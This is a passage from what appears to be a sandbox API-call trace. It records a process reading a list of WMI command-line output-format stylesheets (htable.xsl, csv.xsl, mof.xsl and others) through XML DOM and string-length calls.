attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.673] malloc (_Size=0x18) returned 0x3ec5e0 [0259.673] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.674] free (_Block=0x3ec5e0) [0259.674] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0259.674] malloc (_Size=0x18) returned 0x3ec5e0 [0259.674] malloc (_Size=0x18) returned 0x3ec600 [0259.674] SysStringLen (param_1="RAWXML") returned 0x6 [0259.674] SysStringLen (param_1="TABLE") returned 0x5 [0259.674] SysStringLen (param_1="RAWXML") returned 0x6 [0259.674] SysStringLen (param_1="LIST") returned 0x4 [0259.674] SysStringLen (param_1="LIST") returned 0x4 [0259.674] SysStringLen (param_1="RAWXML") returned 0x6 [0259.674] malloc (_Size=0x30) returned 0x3e8140 [0259.674] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.674] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.674] IUnknown:Release (This=0x232a280) returned 0x0 [0259.674] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=4, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.674] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="htable.xsl") returned 0x0 [0259.674] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.674] malloc (_Size=0x18) returned 0x3ec620 [0259.674] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.675] free (_Block=0x3ec620) [0259.675] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0259.675] malloc (_Size=0x18) returned 0x3ec620 [0259.675] malloc (_Size=0x18) returned 0x3ec640 [0259.675] SysStringLen (param_1="HTABLE") returned 0x6 [0259.675] SysStringLen (param_1="TABLE") returned 0x5 [0259.675] SysStringLen (param_1="HTABLE") returned 0x6 [0259.675] SysStringLen (param_1="LIST") returned 0x4 [0259.675] malloc (_Size=0x30) returned 0x3e8180 [0259.675] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.675] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.675] IUnknown:Release (This=0x232a280) returned 0x0 [0259.675] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=5, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.675] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="hform.xsl") returned 0x0 [0259.675] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.675] malloc (_Size=0x18) returned 0x3ec660 [0259.675] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.676] free (_Block=0x3ec660) [0259.676] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0259.676] malloc (_Size=0x18) returned 0x3ec660 [0259.676] malloc (_Size=0x18) returned 0x3ec680 [0259.676] SysStringLen (param_1="HFORM") returned 0x5 [0259.676] SysStringLen (param_1="TABLE") returned 0x5 [0259.676] SysStringLen (param_1="HFORM") returned 0x5 [0259.676] SysStringLen (param_1="LIST") returned 0x4 [0259.676] SysStringLen (param_1="HFORM") returned 0x5 [0259.676] SysStringLen (param_1="HTABLE") returned 0x6 [0259.676] malloc (_Size=0x30) returned 0x3e81c0 [0259.676] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.676] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.676] IUnknown:Release (This=0x232a280) returned 0x0 [0259.676] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=6, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.676] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="xml.xsl") returned 0x0 [0259.676] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.676] malloc (_Size=0x18) returned 0x3ec6a0 [0259.676] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.677] free (_Block=0x3ec6a0) [0259.677] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0259.677] malloc (_Size=0x18) returned 0x3ec6a0 [0259.677] malloc (_Size=0x18) returned 0x3ec6c0 [0259.677] SysStringLen (param_1="XML") returned 0x3 [0259.677] SysStringLen (param_1="TABLE") returned 0x5 [0259.677] SysStringLen (param_1="XML") returned 0x3 [0259.677] SysStringLen (param_1="VALUE") returned 0x5 [0259.677] SysStringLen (param_1="VALUE") returned 0x5 [0259.677] SysStringLen (param_1="XML") returned 0x3 [0259.677] malloc (_Size=0x30) returned 0x3e8200 [0259.677] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.677] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.677] IUnknown:Release (This=0x232a280) returned 0x0 [0259.677] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=7, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.677] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="mof.xsl") returned 0x0 [0259.677] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.677] malloc (_Size=0x18) returned 0x3ec6e0 [0259.677] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.678] free (_Block=0x3ec6e0) [0259.678] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0259.678] malloc (_Size=0x18) returned 0x3ec6e0 [0259.678] malloc (_Size=0x18) returned 0x3ec700 [0259.678] SysStringLen (param_1="MOF") returned 0x3 [0259.678] SysStringLen (param_1="TABLE") returned 0x5 [0259.678] SysStringLen (param_1="MOF") returned 0x3 [0259.678] SysStringLen (param_1="LIST") returned 0x4 [0259.678] SysStringLen (param_1="MOF") returned 0x3 [0259.678] SysStringLen (param_1="RAWXML") returned 0x6 [0259.678] SysStringLen (param_1="LIST") returned 0x4 [0259.678] SysStringLen (param_1="MOF") returned 0x3 [0259.678] malloc (_Size=0x30) returned 0x3e8240 [0259.678] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.678] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.678] IUnknown:Release (This=0x232a280) returned 0x0 [0259.678] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=8, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.678] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="csv.xsl") returned 0x0 [0259.678] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.679] malloc (_Size=0x18) returned 0x3ec720 [0259.679] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.679] free (_Block=0x3ec720) [0259.679] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0259.679] malloc (_Size=0x18) returned 0x3ec720 [0259.679] malloc (_Size=0x18) returned 0x3ec740 [0259.679] SysStringLen (param_1="CSV") returned 0x3 [0259.679] SysStringLen (param_1="TABLE") returned 0x5 [0259.679] SysStringLen (param_1="CSV") returned 0x3 [0259.679] SysStringLen (param_1="LIST") returned 0x4 [0259.679] SysStringLen (param_1="CSV") returned 0x3 [0259.679] SysStringLen (param_1="HTABLE") returned 0x6 [0259.679] SysStringLen (param_1="CSV") returned 0x3 [0259.679] SysStringLen (param_1="HFORM") returned 0x5 [0259.679] malloc (_Size=0x30) returned 0x3e8280 [0259.679] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.679] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.679] IUnknown:Release (This=0x232a280) returned 0x0 [0259.679] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=9, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.680] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.680] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.680] malloc (_Size=0x18) returned 0x3ec760 [0259.680] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.680] free (_Block=0x3ec760) [0259.680] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0259.680] malloc (_Size=0x18) returned 0x3ec760 [0259.680] malloc (_Size=0x18) returned 0x3ec780 [0259.680] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.680] SysStringLen (param_1="TABLE") returned 0x5 [0259.680] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.680] SysStringLen (param_1="VALUE") returned 0x5 [0259.680] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.680] SysStringLen (param_1="XML") returned 0x3 [0259.680] SysStringLen (param_1="XML") returned 0x3 [0259.680] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.680] malloc (_Size=0x30) returned 0x3e82c0 [0259.680] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.680] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.680] IUnknown:Release (This=0x232a280) returned 0x0 [0259.680] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=10, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.681] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.681] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.681] malloc (_Size=0x18) returned 0x3ec7a0 [0259.681] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.681] free (_Block=0x3ec7a0) [0259.681] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0259.681] malloc (_Size=0x18) returned 0x3ec7a0 [0259.681] malloc (_Size=0x18) returned 0x3ec7c0 [0259.681] SysStringLen (param_1="texttablewsys") returned 0xd [0259.681] SysStringLen (param_1="TABLE") returned 0x5 [0259.681] SysStringLen (param_1="texttablewsys") returned 0xd [0259.681] SysStringLen (param_1="XML") returned 0x3 [0259.681] SysStringLen (param_1="texttablewsys") returned 0xd [0259.681] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.681] SysStringLen (param_1="XML") returned 0x3 [0259.681] SysStringLen (param_1="texttablewsys") returned 0xd [0259.681] malloc (_Size=0x30) returned 0x3e8300 [0259.681] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.681] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.682] IUnknown:Release (This=0x232a280) returned 0x0 [0259.682] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=11, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.682] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.682] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.682] malloc (_Size=0x18) returned 0x3ec7e0 [0259.682] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.682] free (_Block=0x3ec7e0) [0259.682] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0259.682] malloc (_Size=0x18) returned 0x3ec7e0 [0259.682] malloc (_Size=0x18) returned 0x3ec800 [0259.682] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.682] SysStringLen (param_1="TABLE") returned 0x5 [0259.682] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.682] SysStringLen (param_1="XML") returned 0x3 [0259.682] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.682] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.682] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.682] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.682] malloc (_Size=0x30) returned 0x3e8340 [0259.682] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.683] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.683] IUnknown:Release (This=0x232a280) returned 0x0 [0259.683] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=12, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.683] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.683] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.683] malloc (_Size=0x18) returned 0x3ec820 [0259.683] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.683] free (_Block=0x3ec820) [0259.683] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0259.683] malloc (_Size=0x18) returned 0x3ec820 [0259.683] malloc (_Size=0x18) returned 0x3ec840 [0259.683] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.683] SysStringLen (param_1="TABLE") returned 0x5 [0259.683] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.683] SysStringLen (param_1="XML") returned 0x3 [0259.683] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.683] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.683] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.683] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.683] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.684] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.684] malloc (_Size=0x30) returned 0x3e8380 [0259.684] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.684] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.684] IUnknown:Release (This=0x232a280) returned 0x0 [0259.684] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=13, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.684] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.684] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.684] malloc (_Size=0x18) returned 0x3ec860 [0259.684] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.684] free (_Block=0x3ec860) [0259.684] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0259.684] malloc (_Size=0x18) returned 0x3ec860 [0259.684] malloc (_Size=0x18) returned 0x3ec880 [0259.684] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.684] SysStringLen (param_1="TABLE") returned 0x5 [0259.684] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.684] SysStringLen (param_1="XML") returned 0x3 [0259.684] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.684] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.685] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.685] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.685] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.685] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.685] malloc (_Size=0x30) returned 0x3e83c0 [0259.685] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.685] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.685] IUnknown:Release (This=0x232a280) returned 0x0 [0259.685] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=14, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.685] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.685] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.685] malloc (_Size=0x18) returned 0x3ec8a0 [0259.685] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.685] free (_Block=0x3ec8a0) [0259.685] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0259.685] malloc (_Size=0x18) returned 0x3ec8a0 [0259.685] malloc (_Size=0x18) returned 0x3ec8c0 [0259.685] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0259.685] SysStringLen (param_1="TABLE") returned 0x5 [0259.686] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0259.686] SysStringLen (param_1="XML") returned 0x3 [0259.686] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0259.686] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.686] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0259.686] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.687] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0259.687] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.687] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.687] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0259.687] malloc (_Size=0x30) returned 0x3e8400 [0259.687] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.687] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.687] IUnknown:Release (This=0x232a280) returned 0x0 [0259.687] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=15, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.687] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="htable.xsl") returned 0x0 [0259.687] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.688] malloc (_Size=0x18) returned 0x3ec8e0 [0259.688] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.688] free (_Block=0x3ec8e0) [0259.688] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0259.688] malloc (_Size=0x18) returned 0x3ec8e0 [0259.688] malloc (_Size=0x18) returned 0x3ec900 [0259.688] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0259.688] SysStringLen (param_1="TABLE") returned 0x5 [0259.688] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0259.688] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.688] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0259.688] SysStringLen (param_1="XML") returned 0x3 [0259.688] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0259.688] SysStringLen (param_1="texttablewsys") returned 0xd [0259.688] SysStringLen (param_1="XML") returned 0x3 [0259.688] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0259.688] malloc (_Size=0x30) returned 0x3e8440 [0259.688] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.688] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.688] IUnknown:Release (This=0x232a280) returned 0x0 [0259.688] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=16, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.689] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="htable.xsl") returned 0x0 [0259.689] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.689] malloc (_Size=0x18) returned 0x3ec920 [0259.689] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.689] free (_Block=0x3ec920) [0259.689] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0259.689] malloc (_Size=0x18) returned 0x3ec920 [0259.689] malloc (_Size=0x18) returned 0x3ec940 [0259.689] SysStringLen (param_1="htable-sortby") returned 0xd [0259.689] SysStringLen (param_1="TABLE") returned 0x5 [0259.689] SysStringLen (param_1="htable-sortby") returned 0xd [0259.689] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.689] SysStringLen (param_1="htable-sortby") returned 0xd [0259.689] SysStringLen (param_1="XML") returned 0x3 [0259.689] SysStringLen (param_1="htable-sortby") returned 0xd [0259.689] SysStringLen (param_1="texttablewsys") returned 0xd [0259.689] SysStringLen (param_1="htable-sortby") returned 0xd [0259.689] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0259.689] SysStringLen (param_1="XML") returned 0x3 [0259.689] SysStringLen (param_1="htable-sortby") returned 0xd [0259.689] malloc (_Size=0x30) returned 0x3e8480 [0259.690] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.690] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.690] IUnknown:Release (This=0x232a280) returned 0x0 [0259.690] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=17, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.690] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="mof.xsl") returned 0x0 [0259.690] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.690] malloc (_Size=0x18) returned 0x3ec960 [0259.690] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.690] free (_Block=0x3ec960) [0259.690] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0259.690] malloc (_Size=0x18) returned 0x3ec960 [0259.690] malloc (_Size=0x18) returned 0x3ec980 [0259.690] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0259.690] SysStringLen (param_1="TABLE") returned 0x5 [0259.690] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0259.690] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.690] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0259.690] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.691] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0259.691] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.691] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.691] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0259.691] malloc (_Size=0x30) returned 0x3e84c0 [0259.691] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.691] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.691] IUnknown:Release (This=0x232a280) returned 0x0 [0259.691] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=18, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.691] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="mof.xsl") returned 0x0 [0259.691] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.691] malloc (_Size=0x18) returned 0x3ec9a0 [0259.691] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.691] free (_Block=0x3ec9a0) [0259.691] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0259.691] malloc (_Size=0x18) returned 0x3ec9a0 [0259.691] malloc (_Size=0x18) returned 0x3ec9c0 [0259.691] SysStringLen (param_1="wmiclimofformat") returned 0xf [0259.691] SysStringLen (param_1="TABLE") returned 0x5 [0259.692] SysStringLen (param_1="wmiclimofformat") returned 0xf [0259.692] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.692] SysStringLen (param_1="wmiclimofformat") returned 0xf [0259.692] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.692] SysStringLen (param_1="wmiclimofformat") returned 0xf [0259.692] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0259.692] SysStringLen (param_1="wmiclimofformat") returned 0xf [0259.692] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0259.692] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.692] SysStringLen (param_1="wmiclimofformat") returned 0xf [0259.692] malloc (_Size=0x30) returned 0x3e8500 [0259.692] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.692] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.692] IUnknown:Release (This=0x232a280) returned 0x0 [0259.692] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=19, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.692] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="textvaluelist.xsl") returned 0x0 [0259.692] IXMLDOMNode:get_attributes (in: This=0x232bd50, 